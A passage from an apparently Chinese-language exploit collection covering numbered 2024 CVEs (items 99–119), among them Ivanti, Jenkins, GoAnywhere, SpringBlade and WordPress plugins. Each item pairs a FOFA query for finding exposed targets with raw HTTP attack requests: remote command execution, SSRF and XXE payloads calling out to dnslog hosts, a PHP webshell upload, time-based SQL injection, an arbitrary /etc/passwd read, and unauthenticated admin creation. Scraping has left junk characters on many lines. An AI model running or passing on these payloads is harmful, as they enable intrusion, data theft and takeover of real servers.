& D* o3 X& x% K/ PAccept-Encoding: gzip, deflate) t8 i: f" i1 w" ]: s# V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 t1 j( ~, ]$ z3 k1 ^) R: f
Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ s+ t7 I1 k; m0 N! D
X-Requested-With: XMLHttpRequest6 r( A5 k6 B0 G% U
_7 A* h2 y) A; o+ F; Yid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
* o5 P+ C2 N, U/ \7 L
V$ f! i- r: }* Q4 y" T, F$ N$ ^: \% J8 i
99. Ncast盈可视高清智能录播系统busiFacade RCE* p n5 N) C |6 Y( u
CVE-2024-0305
6 P# j' L# g: v; I( e4 \$ ]7 [FOFA:app="Ncast-产品" && title=="高清智能录播系统"
( F3 I/ J7 Z/ f7 R2 @POST /classes/common/busiFacade.php HTTP/1.13 n' T+ @9 X0 L2 O. U
Host: 192.168.40.130:8080
+ l8 L$ E/ z: Q& kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 H- T& E E e5 i7 q8 _8 R2 RConnection: close
4 ~/ V3 G/ N( i4 U9 v5 KContent-Length: 1545 f, F: W" V; \! e" n
Accept: */*+ k: n5 ]/ @' R: O
Accept-Encoding: gzip, deflate
6 H$ h, D2 }# v6 H( ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; |% k! {9 z: t! _
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
! g7 U! ~8 j, L& lX-Requested-With: XMLHttpRequest
- Y% U! w5 e" p! W# k$ x
) J- X+ X1 d" f1 k) y%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D1 Q, C( W1 e2 ^& f' }2 _ e. R
}0 G" z& g. S- H! S0 h0 C0 V0 x
' W/ U! e& ^5 m
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传, [0 H/ m/ o" N7 o
CVE-2024-03528 Y! ^* Q: g E: I" C9 k# U
FOFA:icon_hash="874152924"
6 U* ~! w& P# n) BPOST /api/file/formimage HTTP/1.1
$ R/ W( x7 S9 p5 J2 `Host: 192.168.40.130
+ O1 B9 f" W* dUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36+ G$ g+ z2 J( {- C
Connection: close6 m" k: {1 b, ?/ P
Content-Length: 201
- u/ e( k8 s8 h: ?8 H2 Q' FContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
0 P/ n( e0 x( D& e0 RAccept-Encoding: gzip
( j% U3 k# \4 c. w8 i6 t( S+ \. n# A$ O9 J# w+ p
------WebKitFormBoundarygcflwtei
) o) S6 g$ n" S9 a+ Z' c E1 ^Content-Disposition: form-data; name="file";filename="IE4MGP.php"5 E* p4 I$ F: h- t$ z0 t, e
Content-Type: application/x-php
' A+ V; f9 f. S# k; X' W' R
% {4 C! H% j2 V& D8 r/ P# j( l2ayyhRXiAsKXL8olvF5s4qqyI2O
7 n7 E7 `* M' S' E2 f' H------WebKitFormBoundarygcflwtei--
' |2 U( _0 Q9 I2 K
! R5 z7 i8 ?7 e* C; u ]" o4 u1 r" h- b- `5 {% X+ ^1 j! \: P) M
101. ivanti policy secure-22.6命令注入
4 V3 \( ]# b# x/ \/ e8 P! B" DCVE-2024-21887# }2 s6 x E4 ?3 i0 t, ?$ _* W( w
FOFA:body="welcome.cgi?p=logo"5 X( J; b5 [! T* w3 Q
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.15 J i" x9 E2 L& N
Host: x.x.x.xx.x.x.x# D8 V/ x8 w T O5 `% W6 ]/ d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! a0 R( @" q$ H$ B+ I3 kConnection: close! f) m& C" {9 c) Q# v; Y
Accept-Encoding: gzip# L$ O' K7 g" }) R
2 Z0 F) e6 B( S- X
7 x4 U, K- y) Y102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
$ Y, ^' T5 B/ `2 v$ j4 ~CVE-2024-21893, L1 Q) O7 m7 U3 c/ P! O
FOFA:body="welcome.cgi?p=logo"
- O- U8 w3 X% X% r# W! m7 OPOST /dana-ws/saml20.ws HTTP/1.16 i& P. b& w% B E
Host: x.x.x.x
8 P7 N3 f. U/ tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- K0 n( s; r- F, k
Connection: close7 y4 c2 D8 |7 d2 S$ L; u0 c
Content-Length: 792
# T1 i( `' a. b+ q7 {Accept-Encoding: gzip
s* [, }- I- b$ P% i) c/ {* a4 y8 ^- [/ }
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>8 `7 H6 D) ]* ?- _
" @8 ~( G3 K) K+ A$ l4 E103. Ivanti Pulse Connect Secure VPN XXE, t7 R& d2 Q( G; @9 @% p' Z: G
CVE-2024-22024$ k, ?7 b% r. o
FOFA:body="welcome.cgi?p=logo"4 k0 v2 H# I+ I
POST /dana-na/auth/saml-sso.cgi HTTP/1.1# j( q( c9 t6 \% o6 p$ ]( ~
Host: 192.168.40.130:111
/ ]0 \8 ^( L; u$ U% } L% aUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 H, S+ Q; }# ~7 gConnection: close
/ T1 u% {* f! S/ pContent-Length: 204, ?9 l" d- {! b' n# L* k# B7 |% S
Content-Type: application/x-www-form-urlencoded
. Y; N2 w5 O4 z% J; rAccept-Encoding: gzip
. b0 h5 \4 N: O: f6 X& W0 L+ N
' S& I9 b0 L# k8 u1 q3 i6 }SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==4 ~& f6 L2 a$ D) p5 C
: J- J; @' n& O0 |
2 d% P. r; a+ ?; r其中SAMLRequest的值是xml文件内容的base64值,xml文件如下- y- T7 ?1 f0 t4 g
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>) L0 z# N4 I6 L Q8 @, \
* c1 p& G: G0 U, z+ K5 g2 d5 h7 L% B+ o8 l
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露" W! k E8 N% e# V
CVE-2024-0569- ^ w3 C0 L7 |
FOFA:title="TOTOLINK"
t: `+ P6 |$ W& t* O( G- }POST /cgi-bin/cstecgi.cgi HTTP/1.1+ q B: ~) ?+ Q3 M2 S" J
Host:192.168.0.1: U* h' X/ S& H& ~( I
Content-Length:41
+ Z% }2 i# V! R5 z0 mAccept:application/json,text/javascript,*/*;q=0.01
$ z) p( C( a4 b( o" B( C5 TX-Requested-with: XMLHttpRequest
% ]! m1 e n7 C- m# E7 d% C1 CUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.369 ]- p2 C& ]$ v+ L! b: L
Content-Type: application/x-www-form-urlencoded:charset=UTF-8& r( M+ f9 |, e. `
Origin: http://192.168.0.16 @5 x, @+ z/ O) U
Referer: http://192.168.0.1/advance/index.html?time=1671152380564 @% `4 M" }/ S& k
Accept-Encoding:gzip,deflate
1 _6 D: M) a- w$ v. \5 KAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7( W" e2 k- T' r/ U
Connection:close3 g3 e: J8 c* P
4 ]" L; }: g. k+ m2 a
{ _. w. M: i* M5 E, S, R& ]& B
"topicurl":"getSysStatusCfg",
q. z/ w; c9 k4 S: j"token":""0 `8 r& L* q0 ^! I0 q f
}
, i6 U2 X1 D d7 M2 N# @! J3 u
8 j/ W* W& _+ _/ @1 R) [& `4 B105. SpringBlade v3.2.0 export-user SQL 注入
" t; r! h% t4 {8 r1 }FOFA:body="https://bladex.vip"
! P- f4 N9 n. w* z* C; Ahttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
$ P$ _$ X" f7 p2 z2 I0 K4 \; T9 N% R0 b' U' N0 h7 S+ `
106. SpringBlade dict-biz/list SQL 注入
2 w5 r0 m6 C- n' ?" `6 z5 DFOFA:body="Saber 将不能正常工作"
+ G+ _) ~3 u6 j8 M. @ I2 LGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! K4 T4 b1 h( n' ~ b1 ?* aHost: your-ip+ |8 }% H5 D! [% t) m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 c2 P4 F* Q7 y; ]3 T; _ M4 w d8 [Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
8 }) a: i* r4 q; ~$ E4 ]4 Z; `, lAccept-Encoding: gzip, deflate
; ]7 m6 d7 }2 P+ M( t9 m7 ~% m; ~4 DAccept-Language: zh-CN,zh;q=0.9) j( B7 Y8 ^9 [: C$ p; O% w
Connection: close& t5 f: j5 q4 ]. D" U6 w
% d! I, b S5 k6 p! [/ H2 |
U: |; h7 O. O N- O" d
107. SpringBlade tenant/list SQL 注入
) B/ r% ]2 X, ~+ q6 o9 F* YFOFA:body="https://bladex.vip"! d* D l3 H; d( G& D5 B
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1* Q6 k3 g! _3 {4 W9 R! M% Z% ^" [
Host: your-ip |/ P& p" i: i0 b! p" j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ~5 M6 F+ }! O; z. N( K
Blade-Auth:替换为自己的
/ B y& R7 H, _4 gConnection: close
6 ^6 o9 f, z9 E C. p
. E) U: |- V* ^0 L# a+ c q6 g' o7 F
1 h0 g3 A8 z: ~$ h# ?1 F" T108. D-Tale 3.9.0 SSRF' @- B5 ~/ S( _/ D& u
CVE-2024-21642
3 R9 @5 ?7 o5 s' ?9 PFOFA:"dtale/static/images/favicon.png"& v2 y( A1 S9 K$ S
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
$ r: n4 Z. x3 bHost: your-ip
' W9 S: ?2 `# {; B; l8 H2 ?2 vAccept: application/json, text/plain, */*
' }6 [; D& k3 r5 c! \. eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! D7 [- `( `$ R5 R; F1 k9 l
Accept-Encoding: gzip, deflate2 e. W4 l% A+ W& d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; ], a. d! @: f2 ]6 l6 C" |" [+ _
Connection: close
" I' _ ?( G: J; B# Z2 A3 |+ O. _7 ~7 A, ?! k r2 v+ D( ]
5 T% d* T& H( c( k1 U109. Jenkins CLI 任意文件读取. |& c2 P; ]- I$ P3 m0 G8 O: ~: Y; K6 V b
CVE-2024-23897
! o3 H3 m, d+ _. kFOFA:header="X-Jenkins"
% m7 ~5 t0 |% A' L! S' KPOST /cli?remoting=false HTTP/1.1
3 B. j2 \: I+ O sHost:. a4 |' z8 P- i7 x
Content-type: application/octet-stream8 m& I# p6 f, L9 b I& X+ o% a6 M) s
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
' U# c1 R% D6 W2 y5 oSide: upload
- c: I+ A$ F( Z4 ?Connection: keep-alive* S. a# |) |+ ?! `2 E0 C
Content-Length: 163! x) I' ^4 E4 Q2 L' f" Y- U- q
1 H2 b- I& k$ d% e$ c" M7 f3 Y
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
* q7 A1 Q5 |2 `7 k$ Y. `! y. z5 U+ V, x+ K
. z+ z, O$ m9 ~) I1 n9 a( tPOST /cli?remoting=false HTTP/1.1
% ^: @1 A1 R- W2 ~Host:+ A F8 W2 k0 k: Z5 ]
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e920 V, z$ D* V1 s6 R" q& b) s; W/ X L
download' T0 W! A: Q' e1 f1 J& X
Content-Type: application/x-www-form-urlencoded# U# _% V. N/ S5 q
Content-Length: 0
9 d' }, y/ R, ?6 ^! z0 t+ R J" H: N
' V+ W* k# H2 c/ A( w" y! t% o
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/ J+ j; e" g6 x- Ojava -jar jenkins-cli.jar help
0 t: P+ o8 t% | M- p8 V, i8 A- U/ n( L[COMMAND]
: Q. y3 l+ |+ Y7 ELists all the available commands or a detailed description of single command.
: ]' i( P" I8 I" W COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)7 K0 N& [7 n% I" q; O
. i' e7 k, v+ N" h9 n
. q. Z3 Z. |- p& W6 ^! i
110. Goanywhere MFT 未授权创建管理员" G2 Y. v7 a& s$ G1 E
CVE-2024-0204
0 C% B( J- e1 f! Z# x+ u% Z+ @FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
) x' \% x+ m+ D6 I2 _GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1; [6 T' i1 d4 s! [ E n
Host: 192.168.40.130:8000& u+ D6 }5 a$ U
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
8 F, W( Q6 L5 j. y/ tConnection: close$ ]* q* P2 B7 G! c; S* @; B
Accept: */* m9 J9 w( F: p" `9 i. y
Accept-Language: en. j" }/ p) }: e8 \7 }9 ]
Accept-Encoding: gzip7 Z6 s( E1 v+ ?' e7 N. y/ \5 R, }: j
3 r! e; {- m P
- h& T7 M2 y Z4 y111. WordPress Plugin HTML5 Video Player SQL注入2 I& G# D4 d! N' i
CVE-2024-1061
# T j! t2 ], [) `4 O1 [& aFOFA:"wordpress" && body="html5-video-player"
! B) s! V! B. x% BGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1! E( o4 N: s6 p4 B0 P, w
Host: 192.168.40.130:1126 X' l6 ?4 @* p, U5 F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- U5 {, Z; U+ G& ]- W
Connection: close
, a& p r/ Q! c* n& o$ p9 E! E" aAccept: */*& g1 A' B; V* T
Accept-Language: en% Z- C' V0 B1 I1 X8 Y6 H6 N) `0 K
Accept-Encoding: gzip
! }7 o/ `2 }1 u4 t& Z' W+ c, L, _+ z9 B
, b% M- m, l& Y! l, `4 }
8 M% M; G0 U& h2 S1 l112. WordPress Plugin NotificationX SQL 注入
/ R X$ W! O, C0 ?- ICVE-2024-1698
: p. H" k, g4 U5 F5 `FOFA:body="/wp-content/plugins/notificationx"
) w! J$ W6 d1 Z p: s: g. X: CPOST /wp-json/notificationx/v1/analytics HTTP/1.1
# ]) G6 o0 @; KHost: {{Hostname}}5 |9 j6 v% K7 U& m' {, M
Content-Type: application/json3 s) @# ~- J$ T2 z
( C+ N; n! j6 n
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}& R7 b) V* H2 l8 p" r
1 u# n( v6 w8 X W5 U9 W
8 f+ j9 \) f8 I, M+ s8 ]3 D
113. WordPress Automatic 插件任意文件下载和SSRF# K. }6 S+ x7 T% L
CVE-2024-279540 Q" B( G; Y' p7 n
FOFA:"/wp-content/plugins/wp-automatic"
* e( _6 i- d# [9 H( zGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
0 b* V& A$ g9 oHost: x.x.x.x
) ^3 L' ^5 e4 w9 t5 }# R2 SUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" O' P! @2 ?7 j. ~- A- p# B
Connection: close: H( |5 [( }4 O4 @+ r' x
Accept: */*' u6 n# N- L- T3 g: k
Accept-Language: en
3 I/ z F& Z. d: V8 w0 ~Accept-Encoding: gzip8 K$ l [4 W! U% C
3 z0 H+ {0 T) o# f2 I
' q$ l6 [9 e+ J5 ?5 U114. WordPress MasterStudy LMS插件 SQL注入
$ O- N/ K& {2 j7 _, P, |3 V% r% RFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
( c# \$ A/ n. e' j- W+ N2 RGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.10 Z( n! j- H0 a
Host: your-ip, v2 J; W1 E3 z5 p9 Y
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 O. g3 ^' d, p8 M+ d
Accept-Charset: utf-8
4 V9 j0 n5 `" ?+ Y* Q5 nAccept-Encoding: gzip, deflate, e- i- \( v+ `
Connection: close& H( n# b% |2 G) h
9 l/ L- P9 k& Z/ u9 \/ z, n7 l
9 d2 H( T5 ^! Y/ H115. WordPress Bricks Builder <= 1.9.6 RCE: c1 v4 i1 B) v0 c+ j! r
CVE-2024-25600
6 O9 n0 O4 G5 A' q3 \FOFA: body="/wp-content/themes/bricks/"8 K1 H: N! Z+ z5 X/ x, B
第一步,获取网站的nonce值
2 V) I4 i& Y$ `/ @GET / HTTP/1.1
, K5 o' S: i) e, d- Q) rHost: x.x.x.x
4 Q+ h+ g1 ?5 V4 c4 |4 |$ |User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.365 Q) O# L5 k, S+ b6 P
Connection: close
: {, J9 A/ n8 r" BAccept-Encoding: gzip/ w& J* m- D! s7 d7 G/ U2 C- b, L
) w+ T$ J/ N& R" H/ E
' ~! w* H) c* S, U3 Q
第二步替换nonce值,执行命令. R& `+ X$ o4 b7 G0 p; O! k
POST /wp-json/bricks/v1/render_element HTTP/1.17 S3 K( W) P/ c# i" o
Host: x.x.x.x
& `! S9 ]& G) d4 D8 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36: T* m# W, P# D# c0 w) X
Connection: close M% G+ w$ h3 I1 I4 t
Content-Length: 356
; G: i& B( [: D9 ^Content-Type: application/json
' z% l& `3 |7 UAccept-Encoding: gzip9 A. R" O$ v8 P- f/ C! B7 `
7 A4 j& E& p% I% v{
. {- Q: u6 S- f+ [& I! m"postId": "1",9 A& x- e1 N' p. l! S
"nonce": "第一步获得的值",' P0 U$ D& j. \8 f1 J9 t
"element": {. ]6 [& d& d+ [# p! u- Y/ D0 r
"name": "container",2 ]$ _& g H- G
"settings": {
8 G/ p* E" j c/ [ t4 A8 }5 e "hasLoop": "true",
$ y' ~: T% y6 L; }8 w$ o: w) ~0 E7 z "query": {
8 T( F( E- H0 F& e "useQueryEditor": true,
% s1 p8 `- b$ x: q "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",( x4 @0 y0 l6 q m; Y4 s5 {9 b+ p- D
"objectType": "post") K( [3 N1 e7 z/ W! a) L
}' U! ]9 D L! `5 q$ O9 q
}
! h8 i7 M: x# j0 F. G }
( ` `/ i. R, M# w1 a0 q}
/ W# o a- t& w8 s7 B: s# m, k0 Y! O& u' z9 j# R( l" Q* F
, b/ a, a. p% [" C/ B
116. wordpress js-support-ticket文件上传
/ V& G" u+ V5 G, T" q" \FOFA:body="wp-content/plugins/js-support-ticket", d( `' _5 g! W/ I+ n) J0 Z
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1. J r1 }/ P5 R! x" i" V
Host:
) s1 W' F! R @- z6 J1 \Content-Type: multipart/form-data; boundary=--------7670991719 n9 e* V1 K6 T
User-Agent: Mozilla/5.0
- D2 o& H; h& @& a C3 e3 `2 ?' y7 u6 \$ [7 E% X
----------767099171
6 O1 w! y2 C( [: X5 bContent-Disposition: form-data; name="action"
1 H) P+ c& B" W( N6 U7 `* p; ]configuration_saveconfiguration
' w) V' ]" m: }0 [! W# ~----------7670991711 O7 a7 v" F# x; g& h, W
Content-Disposition: form-data; name="form_request"+ [# f+ z6 r1 I" C/ I: L1 A
jssupportticket0 i. y# L1 e) ~' T, [! v/ s5 P
----------767099171) r0 x3 O1 L( G' y( @4 @
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"; W0 A6 d5 V6 X4 r8 \4 i4 t
Content-Type: image/png
S2 R) {( f5 z- P0 }----------767099171--( y& N- ?$ J+ Q" w/ T' p
H6 b) g, s1 V; Y! P/ x1 T# d
1 ^& M( P$ E: W6 j2 M& Z117. WordPress LayerSlider插件SQL注入
D$ h4 H- `2 o! R M4 T& [version:7.9.11 – 7.10.0
f2 A5 e1 k/ J$ v0 _0 |* w3 wFOFA:body="/wp-content/plugins/LayerSlider/"
$ M3 ^) o6 B3 A t& H2 mGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
/ `: C) R$ M: c2 y' f {Host: your-ip+ r7 V& Y6 v* k0 H$ x% t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ k4 o( J: @8 j& [* ^ [" F) {! gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) b' Z9 G" ?7 D7 A' k2 e: }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ u. W$ B- P* W' U- o
Accept-Encoding: gzip, deflate, br
0 f" B8 w* f. A& K% `# m8 H9 oConnection: close
- A$ s z( j7 W: ] ?1 i+ J. cUpgrade-Insecure-Requests: 1' F2 F) U0 Q I" {' N4 Y, w5 I2 z- U
6 p. Y9 G3 L: A- _6 b1 p
7 y9 p3 Q$ }, O3 Z5 t118. 北京百绰智能S210管理平台uploadfile.php任意文件上传+ @2 c6 z( h" j4 N6 ^/ g- J
CVE-2024-09396 ]+ {' {: H8 k# b. ~
FOFA:title="Smart管理平台"6 N8 ^* @4 u, l) b+ f3 X. x% ]6 K' Q
POST /Tool/uploadfile.php? HTTP/1.1( D0 d$ ?) Q, [2 e5 {6 l2 t. o
Host: 192.168.40.130:8443! d1 a' B5 a7 X6 @+ C; ~
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8; F \6 `* w- E2 T1 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0# b! y [! ^9 H: Y& Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 m6 X G2 `' z/ x& \+ E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 J' u8 [8 q2 f) o: l
Accept-Encoding: gzip, deflate6 E* E) u4 _' O5 i
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
" t: K8 ]2 ~* x8 T' xContent-Length: 405
( k9 N5 S3 b# u8 zOrigin: https://192.168.40.130:8443
( N3 h/ x# K9 A8 {" s6 f4 h' gReferer: https://192.168.40.130:8443/Tool/uploadfile.php E" s8 O6 t% d C. {
Upgrade-Insecure-Requests: 1; W) {' H) R; R" H4 X" w
Sec-Fetch-Dest: document# `7 I5 Z# \) p% n4 ~& F5 r
Sec-Fetch-Mode: navigate
+ X2 g8 C, t# ?( u7 s% v/ Q4 ~Sec-Fetch-Site: same-origin4 A, s1 t" T( b; w6 X
Sec-Fetch-User: ?1
, a6 z) K, b; ^; q6 ^Te: trailers
. i$ ]4 H5 I( t2 t) ~4 B3 EConnection: close/ g5 d, u& r( l8 R2 r5 V
, C& B6 L p1 u$ V
-----------------------------13979701222747646634037182887
& R( R* o* F# \8 s2 N, t$ l5 g( h. GContent-Disposition: form-data; name="file_upload"; filename="contents.php"
# C9 ?2 d+ j/ L3 \1 t7 hContent-Type: application/octet-stream
9 e' A6 U1 j- ]' r
. N1 M3 k& A9 e! y1 ?. r<?php3 @* F8 \$ w8 [) i% Q1 g) a6 }
system($_POST["passwd"]);" c8 s8 G; Y5 K" m" O
?>. d$ w. P# X1 v3 t& i
-----------------------------13979701222747646634037182887
; w' v# [1 u, v7 e: H; a. QContent-Disposition: form-data; name="txt_path"1 f1 K5 U; G, p7 A0 M
" q4 m- r9 r* p& S, H
/home/src.php, U$ G2 a: H+ M# F) o7 ]( R
-----------------------------13979701222747646634037182887--' z: S, n. @$ G( ~/ }
8 J$ z' h0 I' ^! Z# z4 G! l7 F( f& \) T$ |3 y; i- {
访问/home/src.php
1 ^$ E0 S- o& u1 |- t2 @: a- x: `9 i: W7 x
119. 北京百绰智能S20后台sysmanageajax.php sql注入3 c2 G( D+ d) u& ^
CVE-2024-1254
$ _4 d( p& C6 M4 n {# A8 dFOFA:title="Smart管理平台"
9 X, B' k4 g0 Y% s4 ?& t先登录进入系统,默认账号密码为admin/admin* Z5 e6 D# O5 P
POST /sysmanage/sysmanageajax.php HTTP/1.11( e2 u6 _7 p' E. Y) c. `0 t
Host: x.x.x.x' }* J" z" M2 L& y. I
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee# X/ h0 F8 ~5 |: t( z) x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
" R, D) k# g. @# `Accept: */*
- y9 S6 ?7 u& e: nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 k1 x: H1 W0 U$ XAccept-Encoding: gzip, deflate% {6 Q& T0 B% D% _
Content-Type: application/x-www-form-urlencoded;" e x4 x) ^4 R& b0 d7 v* d
Content-Length: 1095 V1 u1 T+ R' R% P9 \! u/ D x2 n
Origin: https://58.18.133.60:8443" N1 y0 o$ v# I3 u" ?' j6 _
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
& |! l2 ~1 P+ A( H8 G0 FSec-Fetch-Dest: empty
k$ j( N" {) S1 G S2 }4 ]) mSec-Fetch-Mode: cors
8 l; [6 Q+ Z% T6 |( E3 |9 t. OSec-Fetch-Site: same-origin8 `( r6 J% P; n2 J6 X
X-Forwarded-For: 1.1.1.1
* c% j0 X; F* s: Q" |3 o& s3 }) jX-Originating-Ip: 1.1.1.1
